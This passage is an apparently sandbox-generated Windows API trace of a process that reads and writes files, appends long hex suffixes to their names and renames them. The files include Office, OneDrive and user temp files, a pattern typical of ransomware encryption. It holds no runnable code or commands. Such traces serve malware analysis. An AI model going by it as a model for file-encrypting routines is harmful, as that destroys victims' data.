returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00" [0156.491] GetProcessHeap () returned 0x270000 [0156.491] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278510 [0156.491] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x4278510, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.493] CloseHandle (hObject=0x590) returned 1 [0156.496] GetProcessHeap () returned 0x270000 [0156.497] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.497] RtlInterlockedCompareExchange64 () returned 0x2 [0156.497] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0160.626] WriteFile (in: hFile=0x5b8, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0160.803] RtlInterlockedCompareExchange64 () returned 0x6 [0160.803] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0161.017] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x750a220, ReturnLength=0x72aff5c) returned 0x0 [0161.018] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll", lpString2=".A286EFBE52240F654E523F5FF8FCE478CA83700D68BE9DEFDC72766003799F32" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll.A286EFBE52240F654E523F5FF8FCE478CA83700D68BE9DEFDC72766003799F32") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll.A286EFBE52240F654E523F5FF8FCE478CA83700D68BE9DEFDC72766003799F32" [0161.018] GetProcessHeap () returned 0x270000 [0161.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x164) returned 0x74207d8 [0161.018] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x74207d8, Length=0x164, FileInformationClass=0xa) returned 0x0 [0161.020] CloseHandle (hObject=0x5b0) returned 1 [0161.031] GetProcessHeap () returned 0x270000 [0161.033] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0161.033] RtlInterlockedCompareExchange64 () returned 0x4 [0161.033] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0163.957] ReadFile (in: hFile=0x5b0, lpBuffer=0x7492450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0163.958] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0163.959] WriteFile (in: hFile=0x5ac, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0163.967] RtlInterlockedCompareExchange64 () returned 0x1 [0163.967] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.062] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.064] RtlInterlockedCompareExchange64 () returned 0x0 [0164.064] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.079] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.080] RtlInterlockedCompareExchange64 () returned 0x0 [0164.080] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.097] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.099] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a", lpString2=".95A5B4150B74375257334009E08994C50BB115BDEE037BDC208BFB828C8FAA10" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a.95A5B4150B74375257334009E08994C50BB115BDEE037BDC208BFB828C8FAA10") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a.95A5B4150B74375257334009E08994C50BB115BDEE037BDC208BFB828C8FAA10" [0164.099] GetProcessHeap () returned 0x270000 [0164.099] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4275d10 [0164.099] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x4275d10, Length=0x120, FileInformationClass=0xa) returned 0x0 [0164.101] CloseHandle (hObject=0x5b0) returned 1 [0164.107] GetProcessHeap () returned 0x270000 [0164.108] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.108] RtlInterlockedCompareExchange64 () returned 0x1 [0164.108] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.113] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.114] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.116] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.118] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi", lpString2=".EC002CF52F8916E1CC2135375217638ECDE8A1B95122D6DE8AE16825139C2769" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi.EC002CF52F8916E1CC2135375217638ECDE8A1B95122D6DE8AE16825139C2769") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi.EC002CF52F8916E1CC2135375217638ECDE8A1B95122D6DE8AE16825139C2769" [0164.118] GetProcessHeap () returned 0x270000 [0164.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425cb80 [0164.118] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x425cb80, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.127] CloseHandle (hObject=0x5b0) returned 1 [0164.134] GetProcessHeap () returned 0x270000 [0164.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.136] RtlInterlockedCompareExchange64 () returned 0x1 [0164.136] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.140] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.141] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.143] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.144] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv", lpString2=".17B0C287C7DD080EC87EF438FE7AFD429880134963AB3602012892BCFB0C9E77" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv.17B0C287C7DD080EC87EF438FE7AFD429880134963AB3602012892BCFB0C9E77") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv.17B0C287C7DD080EC87EF438FE7AFD429880134963AB3602012892BCFB0C9E77" [0164.144] GetProcessHeap () returned 0x270000 [0164.144] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4275e38 [0164.144] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x4275e38, Length=0x120, FileInformationClass=0xa) returned 0x0 [0164.146] CloseHandle (hObject=0x5b0) returned 1 [0164.150] GetProcessHeap () returned 0x270000 [0164.152] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.152] RtlInterlockedCompareExchange64 () returned 0x1 [0164.152] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.155] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.156] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.157] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.159] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif", lpString2=".906CCF61FB2B45431FAAE58845D2BAB175F2B6E8C9C84B0077D199A76929464A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif.906CCF61FB2B45431FAAE58845D2BAB175F2B6E8C9C84B0077D199A76929464A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif.906CCF61FB2B45431FAAE58845D2BAB175F2B6E8C9C84B0077D199A76929464A" [0164.159] GetProcessHeap () returned 0x270000 [0164.159] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425ca48 [0164.159] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x425ca48, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.161] CloseHandle (hObject=0x5b0) returned 1 [0164.164] GetProcessHeap () returned 0x270000 [0164.165] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.165] RtlInterlockedCompareExchange64 () returned 0x1 [0164.165] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.168] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x6800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.169] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.171] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.172] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav", lpString2=".BAD1A1A4C469A65788A4A331A314C848BD9887CDA64871212ABDC1ED0D895E65" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav.BAD1A1A4C469A65788A4A331A314C848BD9887CDA64871212ABDC1ED0D895E65") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav.BAD1A1A4C469A65788A4A331A314C848BD9887CDA64871212ABDC1ED0D895E65" [0164.172] GetProcessHeap () returned 0x270000 [0164.172] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x4262b50 [0164.172] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x4262b50, Length=0x138, FileInformationClass=0xa) returned 0x0 [0164.174] CloseHandle (hObject=0x5b0) returned 1 [0164.327] GetProcessHeap () returned 0x270000 [0164.330] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.491] RtlInterlockedCompareExchange64 () returned 0xe [0164.492] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.492] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x76b87b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x76b87b8, ReturnLength=0x72aff5c) returned 0x0 [0164.493] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx", lpString2=".3BDB0E7CBFDB1FBFD8E7F5847B64D844A4D8302FB2864634D0E94484A1A2D441" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx.3BDB0E7CBFDB1FBFD8E7F5847B64D844A4D8302FB2864634D0E94484A1A2D441") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx.3BDB0E7CBFDB1FBFD8E7F5847B64D844A4D8302FB2864634D0E94484A1A2D441" [0164.493] GetProcessHeap () returned 0x270000 [0164.493] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4276088 [0164.493] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x72aff4c, FileInformation=0x4276088, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0164.496] CloseHandle (hObject=0x5cc) returned 1 [0164.500] GetProcessHeap () returned 0x270000 [0164.502] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8708 | out: hHeap=0x270000) returned 1 [0164.502] RtlInterlockedCompareExchange64 () returned 0xd [0164.502] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.502] NtQueryObject (in: Handle=0x5d0, ObjectInformationClass=0x1, ObjectInformation=0x76e0910, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x76e0910, ReturnLength=0x72aff5c) returned 0x0 [0164.503] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav", lpString2=".DC5ED72F00767E2390CC185B2246EC4AE6D0061C8EF7B5E23082AD8E67B95B71" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav.DC5ED72F00767E2390CC185B2246EC4AE6D0061C8EF7B5E23082AD8E67B95B71") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav.DC5ED72F00767E2390CC185B2246EC4AE6D0061C8EF7B5E23082AD8E67B95B71" [0164.503] GetProcessHeap () returned 0x270000 [0164.503] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb378 [0164.504] NtSetInformationFile (FileHandle=0x5d0, IoStatusBlock=0x72aff4c, FileInformation=0x42fb378, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.506] CloseHandle (hObject=0x5d0) returned 1 [0164.512] GetProcessHeap () returned 0x270000 [0164.514] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e0860 | out: hHeap=0x270000) returned 1 [0164.526] RtlInterlockedCompareExchange64 () returned 0xc [0164.527] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.527] NtQueryObject (in: Handle=0x5d4, ObjectInformationClass=0x1, ObjectInformation=0x7708a68, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7708a68, ReturnLength=0x72aff5c) returned 0x0 [0164.528] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt", lpString2=".6C0E35637CFC71E800770657D0E6DDDE80FF226142B9A65E575B0097CCB39972" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt.6C0E35637CFC71E800770657D0E6DDDE80FF226142B9A65E575B0097CCB39972") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt.6C0E35637CFC71E800770657D0E6DDDE80FF226142B9A65E575B0097CCB39972" [0164.528] GetProcessHeap () returned 0x270000 [0164.528] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb4c0 [0164.528] NtSetInformationFile (FileHandle=0x5d4, IoStatusBlock=0x72aff4c, FileInformation=0x42fb4c0, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.530] CloseHandle (hObject=0x5d4) returned 1 [0164.535] GetProcessHeap () returned 0x270000 [0164.537] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77089b8 | out: hHeap=0x270000) returned 1 [0164.539] RtlInterlockedCompareExchange64 () returned 0xb [0164.539] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.539] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x7730bc0, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7730bc0, ReturnLength=0x72aff5c) returned 0x0 [0164.541] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png", lpString2=".64919444735C127E825679C3B8E8F2CE6BDEC81E6586889C7BB391FE7DEB174E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png.64919444735C127E825679C3B8E8F2CE6BDEC81E6586889C7BB391FE7DEB174E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png.64919444735C127E825679C3B8E8F2CE6BDEC81E6586889C7BB391FE7DEB174E" [0164.541] GetProcessHeap () returned 0x270000 [0164.541] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425d540 [0164.541] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x72aff4c, FileInformation=0x425d540, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.544] CloseHandle (hObject=0x5d8) returned 1 [0164.548] GetProcessHeap () returned 0x270000 [0164.549] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7730b10 | out: hHeap=0x270000) returned 1 [0164.555] RtlInterlockedCompareExchange64 () returned 0xa [0164.555] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.556] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x7758d18, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7758d18, ReturnLength=0x72aff5c) returned 0x0 [0164.557] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav", lpString2=".6EC0B496EF26B1A050F12B4EE62F87B17A630274ACAB7F0E589F3AAA3F84055C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav.6EC0B496EF26B1A050F12B4EE62F87B17A630274ACAB7F0E589F3AAA3F84055C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav.6EC0B496EF26B1A050F12B4EE62F87B17A630274ACAB7F0E589F3AAA3F84055C" [0164.557] GetProcessHeap () returned 0x270000 [0164.557] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x76b8708 [0164.557] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x72aff4c, FileInformation=0x76b8708, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.560] CloseHandle (hObject=0x5dc) returned 1 [0164.565] GetProcessHeap () returned 0x270000 [0164.567] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7758c68 | out: hHeap=0x270000) returned 1 [0164.569] RtlInterlockedCompareExchange64 () returned 0x9 [0164.570] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.570] NtQueryObject (in: Handle=0x5e0, ObjectInformationClass=0x1, ObjectInformation=0x7780e70, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7780e70, ReturnLength=0x72aff5c) returned 0x0 [0164.571] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif", lpString2=".F8E2C682CD6073D227A54F5034CA8AE5A2683E96D0ABCF9CEE6E6A947B793019" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif.F8E2C682CD6073D227A54F5034CA8AE5A2683E96D0ABCF9CEE6E6A947B793019") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif.F8E2C682CD6073D227A54F5034CA8AE5A2683E96D0ABCF9CEE6E6A947B793019" [0164.571] GetProcessHeap () returned 0x270000 [0164.571] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425d678 [0164.571] NtSetInformationFile (FileHandle=0x5e0, IoStatusBlock=0x72aff4c, FileInformation=0x425d678, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.573] CloseHandle (hObject=0x5e0) returned 1 [0164.581] GetProcessHeap () returned 0x270000 [0164.583] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7780dc0 | out: hHeap=0x270000) returned 1 [0164.585] RtlInterlockedCompareExchange64 () returned 0x8 [0164.585] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.585] WriteFile (in: hFile=0x4a8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x7600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: 